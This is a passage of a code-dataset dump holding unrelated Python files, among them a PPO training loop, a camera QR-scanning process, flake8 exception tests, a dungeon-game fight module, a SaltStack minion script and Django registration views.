== horizon-1: # last time step of an agent\n nonterminal = 1\n e = t // horizon\n delta = rew[t] + gamma * seg[\"nextvpred\"][e] * nonterminal - vpred[t]\n else:\n nonterminal = 1 - new[t + 1]\n delta = rew[t] + gamma * vpred[t + 1] * nonterminal - vpred[t]\n gaelam[t] = lastgaelam = delta + gamma * lam * nonterminal * lastgaelam\n #print(\"convpred = \" + str(vpred))\n seg[\"tdlamret\"] = seg[\"adv\"] + seg[\"vpred\"]\n\ndef learn(env, policy_func, *,\n timesteps_per_batch, # timesteps per actor per update\n clip_param, entcoeff, # clipping parameter epsilon, entropy coeff\n optim_epochs, optim_stepsize, optim_batchsize, # optimization hypers\n gamma, lam, # advantage estimation\n max_timesteps=0, max_episodes=0, max_iters=0, max_seconds=0, # time constraint\n noisy_nets=False,\n callback=None, # you can do anything in the callback, since it takes locals(), globals()\n adam_epsilon=1e-5,\n schedule='constant', # annealing for stepsize parameters (epsilon and adam)\n desired_kl=0.02,\n logdir=\".\",\n agentName=\"PPO-Agent\",\n resume = 0,\n num_parallel=1,\n num_cpu=1\n ):\n # Setup losses and stuff\n # ----------------------------------------\n rank = MPI.COMM_WORLD.Get_rank()\n ob_space = env.observation_space\n ac_space = env.action_space\n\n ob_size = ob_space.shape[0]\n ac_size = ac_space.shape[0]\n\n #print(\"rank = \" + str(rank) + \" ob_space = \"+str(ob_space.shape) + \" ac_space = \"+str(ac_space.shape))\n #exit(0)\n pi = policy_func(\"pi\", ob_space, ac_space, noisy_nets) # Construct network for new policy\n oldpi = policy_func(\"oldpi\", ob_space, ac_space, noisy_nets) # Network for old policy\n atarg = tf.placeholder(dtype=tf.float32, 
shape=[None]) # Target advantage function (if applicable)\n ret = tf.placeholder(dtype=tf.float32, shape=[None]) # Empirical return\n\n lrmult = tf.placeholder(name='lrmult', dtype=tf.float32, shape=[]) # learning rate multiplier, updated with schedule\n clip_param = clip_param * lrmult # Annealed cliping parameter epislon\n\n ob = U.get_placeholder_cached(name=\"ob\")\n ac = pi.pdtype.sample_placeholder([None])\n\n kloldnew = oldpi.pd.kl(pi.pd)\n ent = pi.pd.entropy()\n meankl = U.mean(kloldnew)\n meanent = U.mean(ent)\n pol_entpen = (-entcoeff) * meanent\n\n ratio = tf.exp(pi.pd.logp(ac) - oldpi.pd.logp(ac)) # pnew / pold\n surr1 = ratio * atarg # surrogate from conservative policy iteration\n surr2 = U.clip(ratio, 1.0 - clip_param, 1.0 + clip_param) * atarg #\n pol_surr = - U.mean(tf.minimum(surr1, surr2)) # PPO's pessimistic surrogate (L^CLIP)\n vfloss1 = tf.square(pi.vpred - ret)\n vpredclipped = oldpi.vpred + tf.clip_by_value(pi.vpred - oldpi.vpred, -clip_param, clip_param)\n vfloss2 = tf.square(vpredclipped - ret)\n vf_loss = .5 * U.mean(tf.maximum(vfloss1, vfloss2)) # we do the same clipping-based trust region for the value function\n #vf_loss = U.mean(tf.square(pi.vpred - ret))\n total_loss = pol_surr + pol_entpen + vf_loss\n losses = [pol_surr, pol_entpen, vf_loss, meankl, meanent]\n loss_names = [\"pol_surr\", \"pol_entpen\", \"vf_loss\", \"kl\", \"ent\"]\n\n var_list = pi.get_trainable_variables()\n lossandgrad = U.function([ob, ac, atarg, ret, lrmult], losses + [U.flatgrad(total_loss, var_list)])\n adam = MpiAdam(var_list, epsilon=adam_epsilon)\n\n assign_old_eq_new = U.function([],[], updates=[tf.assign(oldv, newv)\n for (oldv, newv) in zipsame(oldpi.get_variables(), pi.get_variables())])\n compute_losses = U.function([ob, ac, atarg, ret, lrmult], losses)\n\n U.initialize()\n adam.sync()\n\n # Prepare for rollouts\n # ----------------------------------------\n if noisy_nets:\n stochastic = False\n else:\n stochastic = True\n seg_gen = traj_segment_generator(pi, env, timesteps_per_batch, stochastic=stochastic, num_parallel=num_parallel, num_cpu=num_cpu, rank=rank, ob_size=ob_size, ac_size=ac_size,com=MPI.COMM_WORLD)\n\n episodes_so_far = 0\n timesteps_so_far = 0\n iters_so_far = 0\n tstart = time.time()\n lenbuffer = deque(maxlen=100) # rolling buffer for episode lengths\n rewbuffer = deque(maxlen=100) # rolling buffer for episode rewards\n\n saver = tf.train.Saver()\n if resume > 0:\n saver.restore(tf.get_default_session(), os.path.join(os.path.abspath(logdir), \"{}-{}\".format(agentName, resume)))\n iters_so_far = resume\n assert sum([max_iters>0, max_timesteps>0, max_episodes>0, max_seconds>0])==1, \"Only one time constraint permitted\"\n\n logF = open(os.path.join(logdir, 'log.txt'), 'a')\n logStats = open(os.path.join(logdir, 'log_stats.txt'), 'a')\n\n dump_training = 0\n learn_from_training = 0\n if dump_training:\n if os.path.exists(logdir + \"\\\\\" + 'ob_list_' + str(rank) + '.pkl'):\n with open(logdir + \"\\\\\" +'ob_list_' + str(rank) + '.pkl', 'rb') as f:\n ob_list = pickle.load(f)\n else:\n ob_list = []\n\n # , \"mean\": pi.ob_rms.mean, \"std\": pi.ob_rms.std\n saverRMS = tf.train.Saver({\"_sum\": pi.ob_rms._sum, \"_sumsq\": pi.ob_rms._sumsq, \"_count\": pi.ob_rms._count})\n saverRMS.save(tf.get_default_session(), os.path.join(os.path.abspath(logdir), \"rms.tf\"))\n\n ob_np_a = np.asarray(ob_list)\n ob_np = np.reshape(ob_np_a, (-1,ob_size))\n [vpred, pdparam] = pi._vpred_pdparam(ob_np)\n\n print(\"vpred = \" + str(vpred))\n print(\"pd_param = \" + str(pdparam))\n 
with open('training.pkl', 'wb') as f:\n            pickle.dump(ob_np, f)\n            pickle.dump(vpred, f)\n            pickle.dump(pdparam, f)\n        exit(0)\n\n    if learn_from_training:\n        # , \"mean\": pi.ob_rms.mean, \"std\": pi.ob_rms.std\n        with open('training.pkl', 'rb') as f:\n            ob_np = pickle.load(f)\n            vpred = pickle.load(f)\n            pdparam = pickle.load(f)\n        num = ob_np.shape[0]\n        for i in range(num):\n            xp = ob_np[i][1]\n            ob_np[i][1] = 0.0\n            ob_np[i][18] -= xp\n            ob_np[i][22] -= xp\n            ob_np[i][24] -= xp\n            ob_np[i][26] -= xp\n            ob_np[i][28] -= xp\n            ob_np[i][30] -= xp\n            ob_np[i][32] -= xp\n            ob_np[i][34] -= xp\n        print(\"ob_np = \" + str(ob_np))\n        print(\"vpred = \" + str(vpred))\n        print(\"pdparam = \" + str(pdparam))\n        batch_size = 128\n\n        y_vpred = tf.placeholder(tf.float32, [batch_size, ])\n        y_pdparam = tf.placeholder(tf.float32, [batch_size, pdparam.shape[1]])\n\n        vpred_loss = U.mean(tf.square(pi.vpred - y_vpred))\n        vpdparam_loss = U.mean(tf.square(pi.pdparam - y_pdparam))\n\n        total_train_loss = vpred_loss + vpdparam_loss\n        #total_train_loss = vpdparam_loss\n        #total_train_loss = vpred_loss\n        #coef = 0.01\n        #dense_all = U.dense_all\n        #for a in dense_all:\n        #    total_train_loss += coef * tf.nn.l2_loss(a)\n        #total_train_loss = vpdparam_loss\n        optimizer = tf.train.AdamOptimizer(learning_rate=0.001).minimize(total_train_loss)\n        d = Dataset(dict(ob=ob_np, vpred=vpred, pdparam=pdparam), shuffle=not pi.recurrent)\n        sess = tf.get_default_session()\n        sess.run(tf.global_variables_initializer())\n        saverRMS = tf.train.Saver({\"_sum\": pi.ob_rms._sum, \"_sumsq\": pi.ob_rms._sumsq, \"_count\": pi.ob_rms._count})\n        saverRMS.restore(tf.get_default_session(), os.path.join(os.path.abspath(logdir), \"rms.tf\"))\n        if resume > 0:\n            saver.restore(tf.get_default_session(),\n                          os.path.join(os.path.abspath(logdir), \"{}-{}\".format(agentName, resume)))\n        for q in range(100):\n            sumLoss = 0\n            for batch in d.iterate_once(batch_size):\n                tl, _ = sess.run([total_train_loss, optimizer], feed_dict={pi.ob: batch[\"ob\"], y_vpred: batch[\"vpred\"], y_pdparam:batch[\"pdparam\"]})\n                sumLoss += tl\n            print(\"Iteration \" + str(q)+ \" Loss = \" + str(sumLoss))\n        assign_old_eq_new() # set old parameter values to new parameter values\n\n        # Save as frame 1\n        try:\n            saver.save(tf.get_default_session(), os.path.join(logdir, agentName), global_step=1)\n        except:\n            pass\n        #exit(0)\n\n    while True:\n        if callback: callback(locals(), globals())\n        if max_timesteps and timesteps_so_far >= max_timesteps:\n            break\n        elif max_episodes and episodes_so_far >= max_episodes:\n            break\n        elif max_iters and iters_so_far >= max_iters:\n            break\n        elif max_seconds and time.time() - tstart >= max_seconds:\n            break\n\n        if schedule in ('adaptive', 'constant'):\n            # both use a fixed multiplier; 'adaptive' instead tunes optim_stepsize from the KL below\n            cur_lrmult = 1.0\n        elif schedule == 'linear':\n            cur_lrmult = max(1.0 - float(timesteps_so_far) / max_timesteps, 0.0)\n        elif schedule == 'linear_clipped':\n            cur_lrmult = max(1.0 - float(timesteps_so_far) / max_timesteps, 0.2)\n        elif schedule == 'cyclic':\n            # cur_lrmult = max(1.0 - float(timesteps_so_far) / max_timesteps, 0)\n            raise NotImplementedError\n        else:\n            raise NotImplementedError\n\n        logger.log(\"********** Iteration %i ************\"%iters_so_far)\n\n        seg = seg_gen.__next__()\n        add_vtarg_and_adv(seg, gamma, lam, timesteps_per_batch, num_parallel, num_cpu)\n        #print(\" ob= \" + str(seg[\"ob\"])+ \" rew= \" + str(seg[\"rew\"])+ \" vpred= \" + str(seg[\"vpred\"])+ \" new= \" + str(seg[\"new\"])+ \" ac= \" + str(seg[\"ac\"])+ \" prevac= \" + str(seg[\"prevac\"])+ \" nextvpred= \" + str(seg[\"nextvpred\"])+ \" ep_rets= \" + str(seg[\"ep_rets\"])+ 
\" ep_lens= \" + str(seg[\"ep_lens\"]))\n\n #exit(0)\n # ob, ac, atarg, ret, td1ret = map(np.concatenate, (obs, acs, atargs, rets, td1rets))\n ob, ac, atarg, tdlamret = seg[\"ob\"], seg[\"ac\"], seg[\"adv\"], seg[\"tdlamret\"]\n\n if dump_training:\n ob_list.append(ob.tolist())\n vpredbefore = seg[\"vpred\"] # predicted value function before udpate\n atarg = (atarg - atarg.mean()) / atarg.std() # standardized advantage function estimate\n d = Dataset(dict(ob=ob, ac=ac, atarg=atarg, vtarg=tdlamret), shuffle=not pi.recurrent)\n optim_batchsize = optim_batchsize or ob.shape[0]\n\n if hasattr(pi, \"ob_rms\"): pi.ob_rms.update(ob) # update running mean/std for policy\n\n assign_old_eq_new() # set old parameter values to new parameter values\n logger.log(\"Optimizing...\")\n logger.log(fmt_row(13, loss_names))\n # Here we do a bunch of optimization epochs over the data\n for _ in range(optim_epochs):\n losses = [] # list of tuples, each of which gives the loss for a minibatch\n for batch in d.iterate_once(optim_batchsize):\n *newlosses, g = lossandgrad(batch[\"ob\"], batch[\"ac\"], batch[\"atarg\"], batch[\"vtarg\"], cur_lrmult)\n if desired_kl != None and schedule == 'adaptive':\n if newlosses[-2] > desired_kl * 2.0:\n optim_stepsize = max(1e-8, optim_stepsize / 1.5)\n print('kl divergence was too large = ', newlosses[-2])\n print('New optim_stepsize = ', optim_stepsize)\n elif newlosses[-2] < desired_kl / 2.0:\n optim_stepsize = min(1e0, optim_stepsize * 1.5)\n print('kl divergence was too small = ', newlosses[-2])\n print('New optim_stepsize = ', optim_stepsize)\n adam.update(g, optim_stepsize * cur_lrmult)\n losses.append(newlosses)\n #print(str(losses))\n logger.log(fmt_row(13, np.mean(losses, axis=0)))\n\n logger.log(\"Evaluating losses...\")\n losses = []\n for batch in d.iterate_once(optim_batchsize):\n newlosses = compute_losses(batch[\"ob\"], batch[\"ac\"], batch[\"atarg\"], batch[\"vtarg\"], cur_lrmult)\n losses.append(newlosses)\n meanlosses,_,_ = mpi_moments(losses, axis=0)\n logger.log(fmt_row(13, meanlosses))\n\n for (lossval, name) in zipsame(meanlosses, loss_names):\n logger.record_tabular(\"loss_\"+name, lossval)\n logger.record_tabular(\"ev_tdlam_before\", explained_variance(vpredbefore, tdlamret))\n lrlocal = (seg[\"ep_lens\"], seg[\"ep_rets\"]) # local values\n listoflrpairs = MPI.COMM_WORLD.allgather(lrlocal) # list of tuples\n lens, rews = map(flatten_lists, zip(*listoflrpairs))\n lenbuffer.extend(lens)\n rewbuffer.extend(rews)\n\n logger.record_tabular(\"EpLenMean\", np.mean(lenbuffer))\n rewmean = np.mean(rewbuffer)\n logger.record_tabular(\"EpRewMean\", rewmean)\n logger.record_tabular(\"EpThisIter\", len(lens))\n episodes_so_far += len(lens)\n timesteps_so_far += sum(lens)\n iters_so_far += 1\n\n logger.record_tabular(\"EpisodesSoFar\", episodes_so_far)\n logger.record_tabular(\"TimestepsSoFar\", timesteps_so_far)\n logger.record_tabular(\"TimeElapsed\", time.time() - tstart)\n\n if dump_training:\n with open(logdir + \"\\\\\" + 'ob_list_' + str(rank) + '.pkl', 'wb') as f:\n pickle.dump(ob_list, f)\n\n if MPI.COMM_WORLD.Get_rank()==0:\n logF.write(str(rewmean) + \"\\n\")\n logStats.write(logger.get_str() + \"\\n\")\n logF.flush()\n logStats.flush()\n\n logger.dump_tabular()\n\n try:\n os.remove(logdir + \"/checkpoint\")\n except OSError:\n pass\n try:\n saver.save(tf.get_default_session(), os.path.join(logdir, agentName), global_step=iters_so_far)\n except:\n pass\n\ndef flatten_lists(listoflists):\n return [el for list_ in listoflists for el in 
list_]\n","sub_path":"baselines/ppo1/pposgd_parallel.py","file_name":"pposgd_parallel.py","file_ext":"py","file_size_in_byte":25406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"229395361","text":"\r\n# -*- coding: utf-8 -*-\r\nfrom pybloom import BloomFilter\r\nimport pybloomfilter\r\n\r\nbf = BloomFilter(capacity=1000, error_rate=0.001)\r\nbf = bf.fromfile(open('18', 'r'))\r\nprint(bf)\r\nprint(bf.__contains__(u'文档'))\r\n#\r\n# from pybloomfilter import BloomFilter\r\n#\r\nbf = pybloomfilter.BloomFilter(10000000, 0.01, 'filter.bloom')\r\n# print(1)\r\n# bf.add(\"ass\")\r\n# print(bf)\r\n","sub_path":"demo/test/testBF.py","file_name":"testBF.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"460494180","text":"# External Dependencies\nfrom multiprocessing import Queue\nfrom threading import Timer\nimport io\nimport time\nimport traceback\nimport operator\n\n\nclass CameraProcess():\n\n def scan_qr_code(in_queue, out_queue):\n from pyzbar import pyzbar\n from .pivideostream import PiVideoStream\n try:\n print(\"Instantiate PiVideoStream start\")\n start_time = int(time.time() * 1000)\n video_stream = PiVideoStream(resolution=(512, 384),framerate=12)\n end_time = int(time.time() * 1000)\n print(f\"Instantiate PiVideoStream finish: {end_time - start_time}ms\")\n\n video_stream.start()\n\n msg = [\"\"]\n\n while True:\n # Loop the reader until we get a result or receive \"stop\"\n frame = video_stream.read()\n\n if frame is None:\n # Camera isn't returning data yet\n time.sleep(0.1)\n continue\n\n barcodes = pyzbar.decode(frame)\n for barcode in barcodes:\n data = barcode.data.decode(\"utf-8\")\n out_queue.put([data])\n break\n if len(barcodes) == 0:\n out_queue.put([\"nodata\"])\n\n try:\n # Get any updates from the message queue, but don't wait\n msg = in_queue.get(block=False)\n except:\n pass\n\n if msg[0] == \"stop\":\n break\n finally:\n try:\n video_stream.stop()\n except:\n pass\n\n\n\n def capture_single_frame(in_queue, out_queue):\n from PIL import Image\n import picamera\n\n print(\"Instantiate PiCamera start\")\n start_time = int(time.time() * 1000)\n camera = picamera.PiCamera(resolution=(720, 480), framerate=8)\n end_time = int(time.time() * 1000)\n print(f\"Instantiate PiCamera finish: {end_time - start_time}ms\")\n\n try:\n print(\"camera ready\")\n out_queue.put([\"ready\"])\n\n # Wait for the \"click\" command\n while True:\n try:\n msg = in_queue.get(block=False)\n break\n except:\n time.sleep(0.1)\n\n if msg[0] == \"stop\":\n print(\"Received 'stop'\")\n return\n\n elif msg[0] == \"click\":\n print(\"Received 'click'\")\n\n # Wait for the automatic gain control to settle\n time.sleep(0.25)\n # Now fix the values\n camera.shutter_speed = camera.exposure_speed\n camera.exposure_mode = 'off'\n g = camera.awb_gains\n camera.awb_mode = 'off'\n camera.awb_gains = g\n\n stream = io.BytesIO()\n camera.capture(stream, format='jpeg')\n\n # \"Rewind\" the stream to the beginning so we can read its content\n stream.seek(0)\n\n out_queue.put([Image.open(stream)])\n\n except Exception as e:\n traceback.print_exc()\n\n finally:\n camera.close()\n print(\"Cleaned up capture_single_frame\")\n\n\n @classmethod\n def start(cls, out_queue, in_queue):\n print(\"CameraProcess start\")\n start_time = int(time.time() * 1000)\n from .pivideostream import PiVideoStream\n end_time = int(time.time() * 1000)\n print(f\"CameraProcess finish import: 
{end_time - start_time}ms\")\n\n is_running = True\n\n while is_running:\n is_camera_on = False\n\n msg = []\n msg = in_queue.get()\n\n if msg[0] == \"start\":\n CameraProcess.scan_qr_code(in_queue, out_queue)\n\n elif msg[0] == \"single_frame\":\n CameraProcess.capture_single_frame(in_queue, out_queue)\n\n elif msg[0] == \"stop\":\n print(\"stop camera!!\")\n\n time.sleep(0.25) # No need to poll all that frequently\n\n\n\nclass CameraPoll(object):\n\n def __init__(self, interval, function, *args, **kwargs):\n self._timer = None\n self.interval = interval\n self.function = function\n self.args = args\n self.kwargs = kwargs\n self.is_running = False\n self.start()\n\n def _run(self):\n self.is_running = False\n self.start()\n self.function(*self.args, **self.kwargs)\n\n def start(self):\n if not self.is_running:\n self._timer = Timer(self.interval, self._run)\n self._timer.start()\n self.is_running = True\n\n def stop(self):\n self._timer.cancel()\n self.is_running = False","sub_path":"src/seedsigner/helpers/camera_process.py","file_name":"camera_process.py","file_ext":"py","file_size_in_byte":4798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"238295732","text":"# Copyright 2021 Huawei Technologies Co., Ltd\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ============================================================================\n\"\"\"run sdk infer\"\"\"\nimport argparse\nimport os\nfrom sr_infer_wrapper import SRInferWrapper\n\ndef parser_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--input_dir\", type=str, default=\"../data/DIV2K/input/\",\n help=\"path of input images directory\")\n parser.add_argument(\"--pipeline_path\", type=str, default=\"../data/config/edsr.pipeline\",\n help=\"path of pipeline file\")\n parser.add_argument(\"--output_dir\", type=str, default=\"../data/sdk_out/\",\n help=\"path of output images directory\")\n return parser.parse_args()\n\n\nif __name__ == '__main__':\n args = parser_args()\n sr_infer = SRInferWrapper()\n sr_infer.load_pipeline(args.pipeline_path)\n path_list = os.listdir(args.input_dir)\n path_list.sort()\n if not os.path.exists(args.output_dir):\n os.makedirs(args.output_dir)\n\n for img_path in path_list:\n print(img_path)\n res = sr_infer.do_infer(os.path.join(args.input_dir, img_path))\n res.save(os.path.join(args.output_dir, img_path.replace('x2', '_infer')))\n","sub_path":"official/cv/EDSR/infer/sdk/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"280954030","text":"\"\"\"Tests for the flake8.exceptions module.\"\"\"\nimport pickle\n\nfrom flake8 import exceptions\n\n\nclass _ExceptionTest:\n def test_pickleable(self):\n \"\"\"Test that the exception is round-trip pickleable.\"\"\"\n for proto in range(pickle.HIGHEST_PROTOCOL + 1):\n new_err = pickle.loads(pickle.dumps(self.err, protocol=proto))\n assert str(self.err) == 
str(new_err)\n orig_e = self.err.original_exception\n new_e = new_err.original_exception\n assert (type(orig_e), orig_e.args) == (type(new_e), new_e.args)\n\n\nclass TestFailedToLoadPlugin(_ExceptionTest):\n \"\"\"Tests for the FailedToLoadPlugin exception.\"\"\"\n\n err = exceptions.FailedToLoadPlugin(\n plugin_name='plugin_name',\n exception=ValueError('boom!'),\n )\n\n\nclass TestInvalidSyntax(_ExceptionTest):\n \"\"\"Tests for the InvalidSyntax exception.\"\"\"\n\n err = exceptions.InvalidSyntax(exception=ValueError('Unexpected token: $'))\n\n\nclass TestPluginRequestedUnknownParameters(_ExceptionTest):\n \"\"\"Tests for the PluginRequestedUnknownParameters exception.\"\"\"\n\n err = exceptions.PluginRequestedUnknownParameters(\n plugin={'plugin_name': 'plugin_name'},\n exception=ValueError('boom!'),\n )\n\n\nclass TestPluginExecutionFailed(_ExceptionTest):\n \"\"\"Tests for the PluginExecutionFailed exception.\"\"\"\n\n err = exceptions.PluginExecutionFailed(\n plugin={'plugin_name': 'plugin_name'},\n exception=ValueError('boom!'),\n )\n","sub_path":"tests/unit/test_exceptions.py","file_name":"test_exceptions.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"349455961","text":"from Charecters.hero import Hero\nfrom Charecters.enemy import Enemy\nfrom .weapon import Weapon\nfrom Dungeon.dungeon import *\n\nclass Fight:\n def __init__(self, hero, enemy,dungeon):\n self.hero = hero\n self.enemy = enemy\n self.dungeon = dungeon\n \n\n @staticmethod\n def greater(a, b):\n if a > b:\n return a\n else:\n return b\n\n def attack_by_hero(self):\n check_weapon = self.dungeon.hero_can_attack_by_weapon(self.enemy)\n if self.hero.can_attack_by_spell() is True and self.hero.can_attack_by_weapon() is True and check_weapon is True:\n #chosen_attack_damage = self.greater(self.hero.attack(by=\"weapon\"), self.hero.attack(by=\"spell\"))\n chosen_attack_damage = self.greater(self.hero.weapon.get_damage(), self.hero.spell.get_damage())\n elif self.hero.can_attack_by_weapon() is True and check_weapon is True:\n chosen_attack_damage = self.hero.weapon.get_damage()\n elif self.hero.can_attack_by_spell() is True:\n chosen_attack_damage = self.hero.spell.get_damage()\n else:\n chosen_attack_damage = 0\n if chosen_attack_damage == 0:\n print(\"Hero can't attack, he has no spell and weapon or is out of mana.\")\n elif chosen_attack_damage == self.hero.spell.get_damage() and self.hero.can_attack_by_spell():\n self.hero.use_mana(self.hero.spell.get_mana_cost())\n self.enemy.take_damage(chosen_attack_damage)\n print(\"Hero casts a \" + self.hero.spell.get_name() + \" ,hits enemy for \" + str(chosen_attack_damage) + \" dmg.\")\n print(\"Enemy health is \" + str(self.enemy.get_health()))\n #Added this so we don't attack with a weapon from miles away\n elif not self.dungeon.hero_attack('weapon'):\n print('Hero cannot cast a spell and is too far to attack by weapon!')\n return\n else:\n self.enemy.take_damage(chosen_attack_damage)\n print(\"Hero hits enemy with a \" + self.hero.weapon.get_name() + \" for \" + str(chosen_attack_damage) + \" dmg.\")\n print(\"Enemy health is \" + str(self.enemy.get_health()))\n\n def attack_by_enemy(self):\n self.hero.take_damage(self.enemy.get_damage())\n print(\"Enemy hits hero for \" + str(self.enemy.get_damage()) + \" dmg.\")\n print(\"Hero health is \" + 
str(self.hero.get_health()))\n\n\n\n\n","sub_path":"Items/fight.py","file_name":"fight.py","file_ext":"py","file_size_in_byte":2408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"201612642","text":"#!/usr/bin/env python\n\nfrom primes import iprimes2\n\nd = 10001\n\n#x is the limit\nx = 100000\nwhile True:\n    for val in iprimes2(x):\n        pass\n    gen = iprimes2(x)\n    li = list(iprimes2(x))\n    length = len(li)\n    last = li[-1]\n    print('[{}: len: {} last: {}]'.format(x, length, last))\n\n    if length == d:\n        #print('{} {} highest: {}'.format(x, length, list(gen)[-1]))\n        break\n    elif length < d:\n        if length < (d / float(2)):\n            x *= 2\n        else:\n            x += 2\n    elif length > d:\n        x -= 2\n","sub_path":"python/problem7.py","file_name":"problem7.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"465608350","text":"import random, math\r\n\r\ndef tower_sample(Pi):\r\n    L=[0]\r\n    K=len(Pi)\r\n    for l in range(1, K+1): L+=[L[l-1]+Pi[l-1], ]\r\n    Upsilon=random.uniform(0, L[-1])\r\n\r\n    for k in range(1, len(L)+1):\r\n        if (Upsilon>L[k-1] and Upsilon<L[k]): break\r\n    return k-1\r\n\r\ndef direct_triangle(X):\r\n    \"\"\"X is a list of the three vertices of a triangle\"\"\"\r\n    Upsilon1=random.uniform(0., 1.)\r\n    Upsilon2=random.uniform(0., 1.)\r\n    if Upsilon1+Upsilon2>1:\r\n        Upsilon1=1-Upsilon1\r\n        Upsilon2=1-Upsilon2\r\n    x=X[0][0]+Upsilon1*(X[1][0]-X[0][0])+Upsilon2*(X[2][0]-X[0][0])\r\n    y=X[0][1]+Upsilon1*(X[1][1]-X[0][1])+Upsilon2*(X[2][1]-X[0][1])\r\n    return [x, y]\r\n\r\ndef direct_polygon(X):\r\n    \"\"\"X is a list of vertices for a polygon with n>3 vertices\"\"\"\r\n    n=len(X)\r\n    s1, s2=0., 0.\r\n    for i in range(n):\r\n        s1+=X[i][0]\r\n        s2+=X[i][1]\r\n    Xc=[s1/n, s2/n]\r\n    X=X+[X[0], ]  # work on a copy so the caller's polygon is not modified\r\n    A=[0]*n\r\n    for k in range(n):\r\n        A[k]=(Xc[0]*X[k][1]+X[k][0]*X[k+1][1]+X[k+1][0]*Xc[1]-X[k][0]*Xc[1]-X[k+1][0]*X[k][1]-Xc[0]*X[k+1][1])/2.\r\n    k=tower_sample(A)\r\n    x=direct_triangle([Xc, X[k], X[k+1]])\r\n    return x\r\n\r\ndef fast_deposition(R, t, L, r, pos):\r\n    \"\"\"box of area=L*L, radius of each identical circle=r.\r\n    R: list of accessible polygons, pos: centres already deposited\r\n    (updated in place).\"\"\"\r\n    A_tot=L**2\r\n    A1=[]\r\n    s=0.\r\n    for X in R:\r\n        n=len(X)\r\n        s1, s2=0., 0.\r\n        for i in range(n):\r\n            s1+=X[i][0]\r\n            s2+=X[i][1]\r\n        Xc=[s1/n, s2/n]\r\n        X=X+[X[0], ]\r\n        A=[0]*n\r\n        for k in range(n):\r\n            A[k]=(Xc[0]*X[k][1]+X[k][0]*X[k+1][1]+X[k+1][0]*Xc[1]-X[k][0]*Xc[1]-X[k+1][0]*X[k][1]-Xc[0]*X[k+1][1])/2.\r\n        A1+=[sum(A), ]\r\n        s+=sum(A)\r\n    p_reject=1-s/A_tot\r\n    # faster-than-the-clock: geometric number of attempts rejected outside the accessible area\r\n    del_t=1+int(math.log(random.random())/math.log(p_reject))\r\n    k=tower_sample(A1)\r\n\r\n    while True:\r\n        p=direct_polygon(R[k])\r\n        if not pos or min([math.sqrt((p[0]-P[0])**2+(p[1]-P[1])**2) for P in pos])>=2*r:\r\n            pos+=[p, ]\r\n            break\r\n        t+=1\r\n    t+=del_t\r\n    return t, R\r\n","sub_path":"Chapter 7/fast-deposition.py","file_name":"fast-deposition.py","file_ext":"py","file_size_in_byte":2113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"299181425","text":"#!/usr/bin/env python\n\nfrom datetime import datetime\nimport os\nimport random\nimport string\nimport sys\nimport time\n\n\npillar_tmpl = \"\"\"\\\ncontroller: lanternctrl1-2\nauth_token: %s\ninstall-from: git\ninstance_id: %s\nproxy_protocol: tcp\n\"\"\"\n\nAUTH_TOKEN_ALPHABET = string.letters + string.digits\nAUTH_TOKEN_LENGTH = 64\n\n\ndef random_auth_token():\n    return ''.join(random.choice(AUTH_TOKEN_ALPHABET)\n                   for _ in xrange(AUTH_TOKEN_LENGTH))\n\ndef minion_id(prefix, n):\n    return '%s-jp-%s-%s' % (\n        prefix,\n        datetime.now().date().isoformat().replace('-', ''),\n        str(n).zfill(3))\n\ndef accept_minions(prefix, start, 
number):\n for i in xrange(start, start+number):\n id_ = minion_id(prefix, i)\n file(\"/srv/pillar/%s.sls\" % id_, 'w').write(\n pillar_tmpl % (random_auth_token(), id_))\n os.system(\"salt-key -ya %s\" % id_)\n\n\nif __name__ == '__main__':\n accept_minions(sys.argv[1],\n int(sys.argv[2]),\n int(sys.argv[3]))\n","sub_path":"salt/cloudmaster/accept_minions.py","file_name":"accept_minions.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"251579135","text":"import os, zipfile\n\nfrom django.conf import settings\nfrom django.core.files.storage import FileSystemStorage\nfrom django.contrib.auth import login, logout, authenticate\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.messages import error, info\nfrom django.shortcuts import render, redirect\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom .forms import UserForm, RegistrationForm, ModuleForm\nfrom .models import User, InviteCode, Modules, UserProfile, ModulesStatus, MessageBoard, Teams, MessageViews\nfrom .helpers import generator\n\n\ndef index(request):\n if request.user.is_authenticated():\n return redirect(\"/home/\")\n\n else:\n form = UserForm()\n return render(request,\"login.html\",{'LoginForm':form})\n\n\ndef register(request, invite=\"0000\"):\n if request.method == \"POST\":\n current_invite = InviteCode.objects.get(invite_code=request.POST['invite'])\n\n if current_invite.active:\n new_user = User.objects.create_user(request.POST['username'],current_invite.email,request.POST['password'])\n new_profile = UserProfile(user=new_user,\n invite_code=request.POST['invite'],\n team=current_invite.leader)\n\n team = Teams(team=current_invite.leader,\n member=new_user)\n\n if current_invite.staff:\n new_user.is_staff = True\n\n new_profile.save()\n new_user.save()\n team.save()\n\n current_invite.active = False\n current_invite.save()\n\n info(request,\"You have been registered, please login\")\n return redirect(\"/login/\")\n else:\n return redirect(\"/\")\n else:\n if 